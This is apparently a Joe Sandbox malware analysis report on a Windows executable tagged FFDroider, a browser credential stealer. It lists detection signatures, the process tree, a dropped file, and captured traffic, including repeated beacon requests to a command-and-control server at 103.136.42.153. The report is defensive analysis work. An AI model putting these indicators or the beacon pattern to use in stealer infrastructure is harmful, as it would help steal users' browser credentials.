Edit tour

Windows Analysis Report
38b2c7a1af454d382927f81543d86055886bc02863457.exe

Overview

General Information

Sample Name:	38b2c7a1af454d382927f81543d86055886bc02863457.exe
Analysis ID:	718337
MD5:	78c42d6817af1ad96cabdf6ff2f7f3da
SHA1:	abeadcee8d9f00c6ccdb0f9d33edd1006a079384
SHA256:	38b2c7a1af454d382927f81543d86055886bc028634575050367d052efd26434
Tags:	exeFFDroider
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

PE file has a writeable .text section

Machine Learning detection for sample

Drops PE files to the document folder of the user

Machine Learning detection for dropped file

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Dropped file seen in connection with other malware

Queries disk information (often used to detect virtual machines)

Classification

Process Tree

System is w10x64

38b2c7a1af454d382927f81543d86055886bc02863457.exe (PID: 5888 cmdline: C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe MD5: 78C42D6817AF1AD96CABDF6FF2F7F3DA)

38b2c7a1af454d382927f81543d86055886bc02863457.exe (PID: 1812 cmdline: "C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe" MD5: 78C42D6817AF1AD96CABDF6FF2F7F3DA)

38b2c7a1af454d382927f81543d86055886bc02863457.exe (PID: 5128 cmdline: "C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe" MD5: 78C42D6817AF1AD96CABDF6FF2F7F3DA)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	Virustotal: Detection: 64%			Perma Link
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Avira: detection malicious, Label: TR/PSW.Agent.hgzdq

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

ReversingLabs: Detection: 96%

Machine Learning detection for sample

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Joe Sandbox ML: detected

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.60.216.35:443 -> 192.168.2.5:49720 version: TLS 1.2

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\30978\Desktop\console_Fb\Release\new_Fb.pdb source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
